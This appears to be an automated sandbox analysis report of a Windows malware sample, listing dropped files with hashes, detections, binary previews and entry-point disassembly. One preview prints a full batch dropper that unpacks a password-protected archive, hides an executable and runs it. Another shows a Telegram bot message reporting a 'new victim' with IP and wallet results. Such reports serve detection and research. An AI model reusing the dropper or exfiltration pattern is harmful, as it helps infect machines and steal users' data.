                                                                                                                                                                                                      Preview:PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1827328
                                                                                                                                                                                                      Entropy (8bit):7.963282633529333
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                                                      MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                      SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                                      SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                                      SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe
                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):3473725
                                                                                                                                                                                                      Entropy (8bit):7.999948676888215
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                                      MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                      SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                      SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                      SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                                      Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):3473725
                                                                                                                                                                                                      Entropy (8bit):7.999948676888215
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                                      MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                      SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                      SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                      SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe
                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):440
                                                                                                                                                                                                      Entropy (8bit):5.0791308599041844
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
                                                                                                                                                                                                      MD5:3626532127E3066DF98E34C3D56A1869
                                                                                                                                                                                                      SHA1:5FA7102F02615AFDE4EFD4ED091744E842C63F78
                                                                                                                                                                                                      SHA-256:2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
                                                                                                                                                                                                      SHA-512:DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe
                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):176
                                                                                                                                                                                                      Entropy (8bit):4.713840781302666
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:S3yE25MOWrYXtHVE/DRFrgm5/gvJgXDLAUDA+ERo6+aEYqVS1f6gq1WGgVSBn:S3mSOWWHVUDjrgmxgRgzLXDA6Va8VeuR
                                                                                                                                                                                                      MD5:8C7CA775CF482C6027B4A2D3DB0F6A31
                                                                                                                                                                                                      SHA1:E3596A87DD6E81BA7CF43B0E8E80DA5BC823EA1A
                                                                                                                                                                                                      SHA-256:52C72CF96B12AE74D84F6C049775DA045FAE47C007DC834CA4DAC607B6F518EA
                                                                                                                                                                                                      SHA-512:19C7D229723249885B125121B3CC86E8C571360C1FB7F2AF92B251E6354A297B4C2B9A28E708F2394CA58C35B20987F8B65D9BD6543370F063BBD59DB4A186AC
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:# Generated file - this directory may be deleted to reset the COM cache.....import win32com..if __path__[:-1] != win32com.__gen_path__: __path__.append(win32com.__gen_path__)..
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):10
                                                                                                                                                                                                      Entropy (8bit):2.7219280948873625
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:qW6:qW6
                                                                                                                                                                                                      MD5:2C7344F3031A5107275CE84AED227411
                                                                                                                                                                                                      SHA1:68ACAD72A154CBE8B2D597655FF84FD31D57C43B
                                                                                                                                                                                                      SHA-256:83CDA9FECC9C008B22C0C8E58CBCBFA577A3EF8EE9B2F983ED4A8659596D5C11
                                                                                                                                                                                                      SHA-512:F58362C70A2017875D231831AE5868DF22D0017B00098A28AACB5753432E8C4267AA7CBF6C5680FEB2DC9B7ABADE5654C3651685167CC26AA208A9EB71528BB6
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:..K....}..
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1827328
                                                                                                                                                                                                      Entropy (8bit):7.963282633529333
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                                                      MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                      SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                                      SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                                      SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):303
                                                                                                                                                                                                      Entropy (8bit):4.9485431528176616
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:5LKS39zKE0g6cJv1Vpv//fTdD3Dd5LJW1CRW35jY:934g6cJv1j/Xn3WV5k
                                                                                                                                                                                                      MD5:6F52D4DB1877B789A41E3D246FE72071
                                                                                                                                                                                                      SHA1:48ABD4ED82586E3872427C3D56926D944C2863B3
                                                                                                                                                                                                      SHA-256:BB0E62DF940826B0F7D7DF84E86192B1ABCF027153A2F65D9BF2E14419198F3A
                                                                                                                                                                                                      SHA-512:7AABB236FFB855699AE947681CFADA064AD3DA7CECDD78B8928E0DC5AB000D166327842B4598968317AFC614B0F6396F33ED80DD4B85D8345E544A7A0C858476
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:{. "ip": "89.187.171.165",. "hostname": "unn-89-187-171-165.cdn77.com",. "city": "Atlanta",. "region": "Georgia",. "country": "US",. "loc": "33.7490,-84.3880",. "org": "AS60068 Datacamp Limited",. "postal": "30302",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                      File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):156917
                                                                                                                                                                                                      Entropy (8bit):7.994509354006501
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                                                      MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                                                      SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                                                      SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                                                      SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, Author: ditekSHen
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):772
                                                                                                                                                                                                      Entropy (8bit):5.0855142862079035
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:YKOHWy1JVBa4YGQVPe071kWlFPyoZERkQJE7BYTlc:YVHWQTBj/Q513PtZgu9ulc
                                                                                                                                                                                                      MD5:E92637EF5482AEAD85E59E5AC4B7775D
                                                                                                                                                                                                      SHA1:E2E536FFC91E75CA15A1903B962B138818D34E80
                                                                                                                                                                                                      SHA-256:8734582073BE10A10C7094F6B144C8E9E502FE12E320EBC9E3A5EB064EB2FEED
                                                                                                                                                                                                      SHA-512:A72980876EAED23B575DC723F345985AB3DCD912481C9602028FA89A9C6DF2B1E7241D4B5D844682D5DF4BCCB533F1909861122A9B725C3833E31101512F328C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:{"ok":true,"result":{"message_id":11787,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734218496,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 89.187.171.165\nDevice Name: 704672\nLocation: Atlanta, Georgia, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":14,"type":"url"},{"offset":63,"length":12,"type":"bold"},{"offset":83,"length":9,"type":"bold"},{"offset":114,"length":8,"type":"bold"},{"offset":123,"length":13,"type":"code"}]}}
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):290
                                                                                                                                                                                                      Entropy (8bit):3.4515725992198174
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:TLXPQXUEZ+lX1lOJUPelkDdt7DY8uy0lqt0:P4Q1lOmeeDD2Vqt0
                                                                                                                                                                                                      MD5:E33654AD48F7A864A965E8FC47400743
                                                                                                                                                                                                      SHA1:C2465105519A79AE2027B3D8A6DDFA53521F4D97
                                                                                                                                                                                                      SHA-256:726689CD9D549FF866C3DDD4A155A9123D3D9D563A42D0FD31D9E9D0EFD400E9
                                                                                                                                                                                                      SHA-512:342AEE3C096D2126AB85F23045AABFC53A84603265F88E34A0F5E5BAB62EA455F2B95B80030535B462D1DBC02C0BD1B95E017AB3CD48ABD73799F9E18134CA83
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:.....F.k'..H......r.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........W.1.0.6.4._.0.3.\.A.r.t.h.u.r...................0...................@3P.........................
                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):288
                                                                                                                                                                                                      Entropy (8bit):3.4243201142247948
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:vjU5VXsQXUEZ+lX1CGdKUe6t7DY8uy0l1t0:v45RJQ1CGAFE2V1t0
                                                                                                                                                                                                      MD5:1EA42F3D04071F54E8A59547D742B546
                                                                                                                                                                                                      SHA1:8B22D7E6906871867B9D62D6A4FB4E050C4B36E6
                                                                                                                                                                                                      SHA-256:60C725A5D738F60EB4F3FE9198E5BBB5F7FF3138267A5E71906F4B999C86EEDB
                                                                                                                                                                                                      SHA-512:38BA9B976569F9A98AC6AF125E3C504FF6AC163D450288B478C2DE98F79B625A5A6184654946AE4C699F4064C73ABFBB8439B06FF8A7F22EA9B79274B01FCB64
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:..... .m..{O.b..1zZ.F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........W.1.0.6.4._.0.3.\.A.r.t.h.u.r...................0...................@3P.........................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):350
                                                                                                                                                                                                      Entropy (8bit):5.0682682106683945
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioBQypHSTgqF1AivwtHgNmtQFfpap1tNjtv:pMpDh5RwXSTgqFyYwzuJA1tNp
                                                                                                                                                                                                      MD5:2F644B7E25627553C5731B735473C859
                                                                                                                                                                                                      SHA1:5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
                                                                                                                                                                                                      SHA-256:2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
                                                                                                                                                                                                      SHA-512:E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..
                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Entropy (8bit):6.522411107697113
                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                      File name:file.exe
                                                                                                                                                                                                      File size:3'028'480 bytes
                                                                                                                                                                                                      MD5:524aff0ae21cf7d4731596e8f3967e32
                                                                                                                                                                                                      SHA1:27a75996dfd0ae578e28613f275b0517c0bbd975
                                                                                                                                                                                                      SHA256:a9ce24b52ece47dfb287b912c5223c5b659df5c2fece87141dfa5820ecda23fd
                                                                                                                                                                                                      SHA512:b65d7bb349d6fee6714bd5b92f2cdad7e69a6d9ddeb6f4cddc808d18a4982a5c9e3cfdaab842667f7fb2c94a8c809aeab5bfe229ca696152d08f3ee453d29334
                                                                                                                                                                                                      SSDEEP:49152:d626AK+dEI8BfYkpYTuxh5h4p7FTa0NhxmZB:wnAKiEIUdp7xh49tRNcB
                                                                                                                                                                                                      TLSH:49E53992B409E6CFE48A16B98427CDC26D6D07FD4B5509C3A878747EBD63CC122B5C2E
                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                      Entrypoint:0x71e000
                                                                                                                                                                                                      Entrypoint Section:.taggant
                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                      Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                      jmp 00007FF994A067AAh
                                                                                                                                                                                                      unpcklps xmm5, dqword ptr [esi]
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add cl, ch
                                                                                                                                                                                                      add byte ptr [eax], ah
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [edx+ecx], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      xor byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [edx], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add al, 0Ah
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add cl, byte ptr [edx]
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
